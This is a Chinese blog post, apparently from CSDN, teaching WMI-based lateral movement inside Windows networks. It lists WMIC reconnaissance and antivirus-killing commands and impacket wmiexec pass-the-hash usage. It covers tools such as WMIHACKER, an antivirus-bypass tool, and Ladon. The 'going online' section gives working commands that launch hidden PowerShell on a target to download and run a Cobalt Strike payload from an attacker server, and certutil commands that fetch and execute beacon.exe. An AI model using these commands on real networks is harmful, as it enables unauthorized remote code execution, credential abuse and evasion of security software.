【内网安全-横向移动】WMI-WMIC命令&相关内网工具

最新推荐文章于 2024-02-29 12:00:00 发布
最新推荐文章于 2024-02-29 12:00:00 发布
阅读量8.7k 收藏 12
点赞数 5
分类专栏: 0X09【内网安全】 文章标签: 安全 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/128924129
版权

目录

一、WMI

1、简述:

 1)官方介绍:

2)优点:

3)条件:

4)不足:

5)WMIC管理命令:

6)相关工具:

 2、上线:

1、wmic

2、impacket-wmiexec

3、wmicmd.exe

4、WMIHACKER

一、WMI

1、简述:

 1)官方介绍:

WMI 具有管理员和 WMI 提供程序编写器使用的多个命令行工具

WMI 命令行工具 - Win32 apps | Microsoft Learnicon-default.png?t=N176https://learn.microsoft.com/zh-cn/windows/win32/wmisdk/wmi-command-line-tools

2)优点:

内网中大多数 Win系统自带 wmic 命令,并且该方法不会在目标日志系统留下痕迹,支持用户名明文或者hash的方式进行认证

3)条件:

目标主机开放 135 端口(建立连接);且允许随机一个高位端口进行数据通信;需要本地管理员或域管理员权限;部分命令可能不可用(如查询杀软);防火墙开放连接、通信端口

4)不足:

系统自带的 WMIC ,连接执行命令无回显--->将执行的返回结果写入文件--->读取文件内容

5)WMIC管理命令:

(命令来自网络)

1、常用命令:
wmic logon list brief            #登录⽤户
wmic ntdomain list brief         #域控机器
wmic useraccount list brief      #⽤户列表
wmic share get name,path         #查看系统共享
wmic service list brief |more    #服务列表
wmic startup list full           #识别开机启动的程序,包括路径
wmic fsdir "c:\\test" call delete             #删除C盘下的test目录
wmic nteventlog get path,filename,writeable   #查看系统中开启的⽇志
wmic nicconfig get ipaddress,macaddress       #查看系统中⽹卡的IP地址和MAC地址
wmic qfe get description,installedOn          #使⽤wmic识别安装到系统中的补丁情况
wmic product get name,version                 #查看系统中安装的软件及版本
wmic useraccount where "name='%UserName%'" call rename newUserName   #更改当前用户名
wmic useraccount where "name='Administrator'" call Rename admin      #更改指定用户名
wmic bios list full | findstr /i "vmware"     #查看当前系统是否是VMWARE(按实际情况进行筛选)
wmic desktop get screensaversecure,screensavertimeout       #查看当前系统是否有屏保,及延迟
wmic process where name="vmtoolsd.exe" get executablepath   #获取指定进程可执行文件的路径
wmic environment where "name='temp'" get UserName,VariableValue      #获取temp环境变量

2、查询当前主机的杀毒软件(可能无法正常使用)
wmic process where "name like '%forti%'" get name
wmic process where name="FortiTray.exe" call terminate
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe
wmic /namespace:\\root\securitycenter2 path antispywareproduct GET displayName,productState, pathToSignedProductExe & wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

3、查询windows机器版本和服务位数和.net版本
wmic os get caption
wmic os get osarchitecture
wmic OS get Caption,CSDVersion,OSArchitecture,Version
wmic product where "Name like 'Microsoft .Net%'" get Name, Version


4、查询本机所有盘符
wmic logicaldisk list brief
wmic logicaldisk get description,name,size,freespace /value

5、卸载和重新安装程序
wmic product where "name like '%Office%'" get name
wmic product where name="Office" call uninstall

6、查看某个进程的详细信息 (路径,命令⾏参数等)
wmic process where name="chrome.exe" list full
wmic process where name="frp.exe" get executablepath,name,ProcessId   进程路径
wmic process where caption="frp.exe" get caption,commandline /value

7、更改PATH环境变量值,新增c:\whoami
wmic environment where "name='path' and username='<system>'" set VariableValue="%path%;c:\whoami

8、查看某个进程的详细信息-PID
wmic process list brief
tasklist /SVC | findstr frp.exe
wmic process where ProcessId=3604 get ParentProcessId,commandline,processid,executablepath,name,CreationClassName,CreationDate

9、终⽌⼀个进程
wmic process where name ="xshell.exe" call terminate
ntsd -c q -p 进程的PID
taskkill -im pid

10、获取电脑产品编号和型号信息
wmic baseboard get Product,SerialNumber
wmic bios get serialnumber

11、安装软件
wmic product get name,version
wmic product list brief

12、使用Powershell操作wmi
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share    #共享
Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile   #⽂件/⽬录列表
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume   #磁盘卷列表
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process  #当前进程
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service  #列举服务
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent           #⽇志
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser         #登陆账户
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering  #补丁
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct #杀毒软件

13、操作系统相关信息
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS

14、注册表操作
Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv
Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents

6)相关工具:

wmiexec.py

impacket/wmiexec.py at master · fortra/impacket (github.com)icon-default.png?t=N176https://github.com/fortra/impacket/blob/master/examples/wmiexec.py

(impacket 工具包里)提供了通过 wmi 执行命令并回显的功能(445、135 和高位随机端口;445端口是SMB连接,完成执行命令的回显),未开放也支持无回显的方式进行命令执行

注:特殊字符用\转移,如@--->\@
1、连接
python3 wmiexec.py  用户名:密码\@目标IP
python3 wmiexec.py  域名/用户名:密码\@目标IP

2、执行命令 
python3 wmiexec.py  域名/用户名:密码\@目标IP  "命令"

3、哈希传递获得shell
python3 wmiexec.py -hashes LM-Hash:NT-Hash 域名/用户名\@目标IP

4、获得shell后,执行命令
python3 wmiexec.py -hashes LM-Hash:NT-Hash 域名/用户名\@目标IP "命令"

Windows操作系统中的密码一般由两部分组成,一部分为LM Hash,另一部分为NTLM Hash

即:username:RID:LM-HASH:NT-HASH

——————

wmicmd

1、简述:一个仅使用WMI的小型实用程序:执行命令shell命令、从这些命令中捕获标准输出并写入注册表、读取然后从注册表中删除、打印到本地标准输出(需要.NET相应版本)

2、项目地址:

nccgroup/WMIcmd: A command shell wrapper using only WMI for Microsoft Windows (github.com)icon-default.png?t=N176https://github.com/nccgroup/WMIcmd(使用方法项目地址里有)

——————

WMIHACKER

1、简述:将执行结果写入到注册表(方法:使用事件触发器调用 VB 代码,达到命令执行效果)

2、区别:(都是写入注册表)wmiexe.py 和 wmicmd 是通过创建win32Process 进程执行命令
3、项目地址:

rootclay/WMIHACKER: A Bypass Anti-virus Software Lateral Movement Command Execution Tool (github.com)icon-default.png?t=N176https://github.com/rootclay/WMIHACKER

——————

Ladon插件(集成)

项目地址:

Releases · k8gege/Ladon (github.com)icon-default.png?t=N176https://github.com/k8gege/Ladon/releases

功能如下:

1、网络资产收集
多协议探测存活主机
仅ICMP探测存活(快)
Oxid多网卡主机探测
多协议操作系统探测
网站、标题、Banner
智能网站CMS识别
常见端口服务探测
Shiro探测
Cisco探测
LDAP服务器探测
FTP服务器探测
枚举MSSQL服务器
枚举共享资源

2、系统信息探测
SMB探测系统信息
WMI探测系统信息
NBT探测系统信息
RDP探测系统信息
SNMP探测系统信息
MSSQL探测系统信息
WINRM探测系统信息
Exchange探测系统信息

3、远程漏洞检测
SMB永恒之蓝检测
SMB永恒之黑检测
Struts2漏洞检测
Weblogic漏洞检测
PhpStudy后门检测
ActiveMQ漏洞检测
Tomcat漏洞检测

4、一键GetShell
Exchange CVE-2020-0688
Weblogic GetShell
Tomcat GetShell

5、网络密码嗅探
FTP密码嗅探
HTTP密码嗅探

6、网络密码审计
445端口SMB密码审计(Windows)
135端口WMI密码审计(Windows)
445端口SMB-HASH密码审计(Windows)
135端口WMI-HASH密码审计(Windows)
139端口NBT密码审计(Windows)
5985端口Winrm密码审计(Windows)
21端口FTP密码审计(多平台)
5900端口VNC密码审计(多平台)
389端口LDAP密码审计(Windows)
1521端口Oracle数据库密码审计(多平台)
1433端口SQL数据库密码审计(Windows)
3306端口MYSQL数据库密码审计(多平台)
7001端口Weblogic后台密码审计(多平台)
Web端口Tomcat后台密码审计(多平台)
Web端口401基础认证密码审计(多平台)
22端口SSH密码审计(Linux_多平台)
网络摄像头密码审计(401认证)

7、本机执行
sc服务执行(system权限)
at计划任务(system权限)
Runas(模拟用户执行)
RunPS(无powershell执行)
ForExec(循环执行命令)

8、远程执行
WinrmExec
SshExec
SmbExec
PsExec
AtExec
WmiExec
WmiExec2
WinrmExec
JspShell
AspShell
AspxShell
PhpShell


9、本地提权
BypassUac
eventvwr
fodhelper
computerdefaults
sdclt
slui

BypassUac2
GetSystem
Runas
ms16135
BadPotato
SweetPotato
RDPHijack
CVE-2021-1675

10、自启动
注册表自启动
服务启动项

11、3389远程桌面
一键开启3389
查看3389远程连接
查看管理员组用户
激活Administrator
激活用户Guest
远程桌面会话劫持

12、远程下载
Http文件下载
FTP文件下载

13、域(DC、LDAP)
域内机器信息获取(域内)
389端口LDAP服务器探测
389端口LDAP密码审计
CVE-2020-1472域控提权

14、后门/木马查看
注册表启动项
系统却持DLL

15、域名解析
Domain2IP
Host2IP

16、端口转发
netsh(系统自带)
PortTran

17、本机信息收集
查看本机IP(内外网)
当前用户、特权信息
GUID、CPUID、DiskID
基础信息(仅cmd获取)
基础信息(含wmi获取)
获取命令行参数
获取进程详细信息
查看IE代理信息
查看本机命名管道
查看3389远程连接
查看USB使用记录
查看管理员组用户
查看最近访问文件
查看安装.NET版本
查看PowerShell版本
查看已安装程序版本

18、本机密码读取
IIS站点密码
CVE-2021-36934
DumpLsass

19、MSF/NC联动
Shell_bind_tcp
Shell_reverse_tcp
Met_reverse_http
Met_reverse_https
Shell_reverse_icmp
Shell_reverse_dns

20、其它功能
网站HTML源码查看

 2、上线:

1、wmic

1)方法一:

Attacks--->Web Drive-by--->Scripted Web Delivery(脚本式网页递送)

进行相关的配置(与后面上线cs命令,紧密贴合)

设置监听器、以及Type为powershell

在客户机上执行wmic命令

wmic /NODE:192.168.*.*(目标主机) /user:"用户" /password:"密码" PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://*.*.*.*:port/a'))\""

上线cs成功

 ——————

2)方法二:

Attacks--->Packages--->payload generator(有效载荷发生器)

选中监听器--->载荷选Powershell

客户机上执行wmic命令(指定机器上线CS)

wmic /NODE:192.168.*.* /user:"用户" /password:"密码" PROCESS call create "powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://*.*.*.*:port/payload.ps1');\""

2、impacket-wmiexec

1)执行命令

交互式&单执行
wmiexec ./administrator:密码@192.168.*.*(目标主机) "whoami"
wmiexec -hashes :值 ./administrator@192.168.*.*(目标主机) "whoami"

——————

2)下载后门

wmiexec ./administrator:密码@192.168.*.*(目标主机) "cmd.exe /c certutil -urlcache -split -f http://192.168.*.*/beacon.exe c:/beacon.exe"

——————

3)执行后门
wmiexec ./administrator:密码@192.168.*.*(目标主机) "cmd.exe /c c:/beacon.exe"

3、wmicmd.exe

(需要.NET环境)

1)在工作组上使用

WMIcmd.exe -h IP -d hostname -u localadmin -p theirpassword -c "command"

2)在域内使用

WMIcmd.exe -h IP -d domain -u domainadmin -p theirpassword -c "command"

4、WMIHACKER

使用方法来自GitHub

rootclay/WMIHACKER:绕过防病毒软件横向移动命令执行工具 (github.com)icon-default.png?t=N176https://github.com/rootclay/WMIHACKER

1、命令执行后显示结果
cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1

2、命令执行后不显示任何结果
cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0

3、获取交互式shell
cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"

4、文件上传:将本地calc.exe复制到远程主机c:\calc.exe
cscript wmihacker_0.6.vbs /upload 172.16.94.187 administrator "Password!" 
"c:\windows\system32\calc.exe" "c:\calc"

5、文件下载:将远程主机calc.exe下载到本地c:\calc.exe
cscript wmihacker_0.6.vbs /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"

 

 

黑色地带(崛起)
关注
  • 5
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
clevo-xsm-wmi:https的克隆
05-11
clevo-xsm-wmi 用于Clevo SM系列笔记本电脑的键盘背光的内核模块。 (以及几种EM / ZM / DM系列型号) 基于TUXEDO Computers GmbH创建的tuxedo-wmi。 在tuxedo-wmi上的添加 Sysfs界面可在模块加载后控制亮度,模式,颜色,开/关状态。 在原始代码中,您只能在模块加载之前进行设置。 基于QT的小型应用程序,可使用sysfs界面直观地控制键盘照明。 循环选择颜色而不是使用键盘键进行模式切换。 实验性支持触摸板照明/机器正面的下部LED灯条。 建造 依存关系: 标准的编译内容(c编译器,make等) linux头文件 qt5-base(用于实用程序) Fedora 22+依赖关系: 使用qmake-qt5而不是qmake 使用DNF安装qt5-qt3d-devel 建造: # For the modul
node-wmic:WMIC周围的Node.js包装器
05-11
节点wmic WMIC周围的Node.js包装器。 将每个WMIC命令输出转换为JavaScript数组。 注意,这是支持所有WMIC命令的v2版本,与v1版本不兼容。 对于1.0.0+版本,请签出分支。 var wmic = require ( 'node-wmic' ) ; 安装 npm install node-wmic --save 例子 const wmic = require ( 'node-wmic' ) ; wmic . CPU ( ) . then ( ( [ cpu ] ) => { console . log ( cpu . AddressWidth ) ; console . log ( cpu . Level ) ; } ) ; wmic . DiskDrive ( ) . then ( items => { console . log ( it
Windows安全基础——Windows WMI详解
最新发布
m0_59598029的博客
02-29 880
WMI(Windows Management Instrumentation, Windows管理规范)是Windows2000/XP管理系统的核心,属于管理数据和操作的基础模块。设计WMI的初衷是达到一种通用性,通过WMI操作系统、应用程序等来管理本地或者远程资源。它支持分布式组件对象模型(DCOM,DistributionModel)和Windows远程管理(WinRM),用户可通过WMI服务访问、配置、管理和监视Windows所有资源的功能。
go-wmi-hyper-v.txt
09-28
go通过调用Windows wmi 生成hyper-v虚拟机,不包括修改内存,CPU等操作
横向移动 -基于smb&wmi 明文或 hash 传递
mingyqf的博客
11-10 758
内网横向 smb&wmi 明文或 hash 传递 演示案例:  Procdump+Mimikatz 配合获取  Hashcat 破解获取 Windows NTML Hash  域横向移动 SMB 服务利用-psexec,smbexec  域横向移动 WMI 服务利用-cscript,wmiexec,wmic  域横向移动以上服务 hash 批量利用-python 编译 exe 案例 1-Procdump+Mimikatz 配合获取 1.1procdump 配合 mimikatz
MASM32编程通过WMI获取杀毒软件信息
Purpleendurer@CSDN
05-24 2347
  Windows XP SP2 开始提供安全中心,杀毒软件会向安全中心注册报道,这样windows就可以检测到系统中是否安装了杀毒软件。  如何在自己的程序中实现这个功能呢?  网上找到的大多是通过WMI来实现的VBScript脚本代码,咱用MASM32来实现之。  完整的代码如下:  (源代码+EXE下载:  1、http://download.csdn.net/source/23
Windows远程cmd工具WMIcmd.exe
07-15
WMIcmd可以连接远程windows服务器,执行cmd命令。(要求远程端必须开启RPC服务,而且NET Framework必须为4.0以上)
初学内网横向命令执行
The current road is different, love needs to distinguish between right and wrong
12-24 1177
简介 横向移动,根据定义是指获取内网某台机器的控制权之后,以被攻陷主机为跳板,通过搜集域内凭证,找办法访问到域内其他机器,再依次循环往复,直到获得域控权限甚至控制内网。 1.IPC 计划任务横向 IPC共享命名管道的资源,是为了实现进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,使用139、445端口。建立向目标主机的IPC$连接,把命令执行的脚本传到目标主机,创建计划任务在目标机器上执行命令脚本。 1、目标主机开启了139和445端口; 2、目标主机开启了ipc$默认
内网渗透-内置工具横向移动
lza20001103的博客
10-01 1183
内置工具横向移动 文章目录内置工具横向移动前言IPCSchtasksIPC+ATIPC+SC后记 前言 前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动工具的使用。 IPC IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view 当前的域有哪些主机 net use 查看当前是否有
内网横移之WMIexec
Canterlot的博客
09-04 2548
本文详细介绍了WMIexec的运行原理及特点,命令执行过程,相关工具用法等
Windows远程执行进程工具psexec和wmiexec介绍
测试开发小记
05-08 3054
在自动化测试或者自动化工具开发中,通常需要向其它电脑或者服务器发送指令,比如Windows发送命令到Linux服务器开启某个服务进程,或者读取状态信息,我们可以使用ssh协议实现。如果Windows主机需要发送命令到局域网内的其它Windows电脑要如何实现呢?在网络安全中称为横向移动内网渗透方法可实现远程执行命令横向移动工具有很多,本文介绍psexec和wmiexec这两个工具如何实现远程执行进程。
dotnet-仅用于MicrosoftWindows的WMI命令shell封装
08-14
仅用于Microsoft Windows的WMI命令shell封装
asus-nb-wmi.rar_Welcome!_asus wmi
09-22
Asus Notebooks WMI hotkey driver,Welcome friends in need share!
工具箱-内网穿透》FRP内网穿透(实现外网访问内网服务)
https://blog.datasource.space
05-23 3776
当出现新的需求,需要通过外网访问内网中的服务的时候,可以通过内网穿透,通过内网指定的端口与外网IP端口转换,达到通过外网IP直接访问内网服务的效果。内网服务器有自己的内部IP,但是通过外网无法访问,所以就需要内网穿透,将外网IP转换为内部合法的IP来进行合法访问。模拟场景:使用虚拟机安装Centos系统模拟内网服务器,外网服务器是正常使用云服务器。3.用户通过公网服务器通过内网穿透来访问内网服务器。通过外网服务器的端口访问内网服务器的端口服务。通过外网服务器的公网IP访问内网服务器
内网渗透学习04——域内横向移动
box
02-24 4758
文章目录0x00 Windows系统密码和Hash获取分析和防范1. Windows 系统密码和Hash获取1.1 使用工具将散列值和明文从内存中导出。1.2 通过SAM和System文件抓取密码1.3Mimikatz 在线读取Hash和密码明文1.4 Mimikatz 离线读取Hash和密码明文1.5 Nishang2. 防范密码和Hash凭证窃取0x01 哈希传递攻击和防范0x02 IPC1. IPC 入侵2. 计划任务 at schtasksatschtasks3. impacket 工具
python wmiexec_impacket远程命令执行记录
weixin_39605840的博客
12-22 1693
impacket远程命令执行记录在横向移动的时候常常会遇到目标445端口被防火墙过滤的情况,那么我们就需要通过其他端口进行横向移动。之前对impacket中远程命令执行的帮助文件看的不是很透彻,导致掉坑里。wmiexec&dcomexec正常我们使用wmiexec、dcomexec的时候,命令会这样写,会回显执行结果。这时wmiexec、dcomexec会使用135、445端口,但如果目标...
攻防演练-实战 | 记一次对某企业的一次内网渗透总结
lza20001103的博客
08-28 1082
实战 | 记一次对某企业的一次内网渗透总结 文章目录实战 | 记一次对某企业的一次内网渗透总结0x01 外网打点到Getshell0x02 内网渗透0x03 横向渗透0x04 痕迹清理0x05 攻击结果0x06 总结 0x01 外网打点到Getshell 目标站点: 通过各种工具和在线网站,对子域名进行收集,并解析ip。发现主站存在CDN,使用fofa,搜索网站title、js等关键信息和子域名解析的ip对应的C段,发现真实ip。对真实ip的ip段进行扫描,发现一台机器存在Weblogic中间件,使用exp
WMI横向移动
网络安全。
02-02 3017
0x01 WMI横向移动简介 简介 WMI全称“windows管理规范”,从win2003开始一直存在。它原本的作用是方便管理员对windows主机进行管理。因此在内网渗透中,我们可以使用WMI进行横向移动。 利用条件 1、WMI服务开启,端口135,默认开启。 2、防火墙允许135、445等端口通信。 0x02 windows自带wmic工具横向移动(推荐) 实际测试(wmic) 08 -&g...
一条wmic命令解决硬盘序列号和mac地址查询
东躲西藏终有尽,但求十年不折腾
07-05 3806
wmic命令获取硬盘序列号和mac地址
WMI-Win32_NetworkAdapter 网卡参数
05-31
WMI-Win32_NetworkAdapter类可以用于获取与计算机上的网络适配器相关的信息。它包含了许多属性,可以用来获取网卡的参数,例如: - AdapterType:网络适配器的类型。 - MACAddress:网络适配器的物理地址。 - NetConnectionID:网络适配器的连接名称。 - NetEnabled:网络适配器是否启用。 - Speed:网络适配器的速度。 你可以使用WMI查询语言(WQL)来查询WMI-Win32_NetworkAdapter类的属性,以获取网卡参数的值。例如,以下是一个使用PowerShell查询网卡参数的示例: ``` Get-WmiObject -Class Win32_NetworkAdapter -Property AdapterType, MACAddress, NetConnectionID, NetEnabled, Speed ``` 这将返回计算机上所有网络适配器的AdapterType、MACAddress、NetConnectionID、NetEnabled和Speed属性的值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值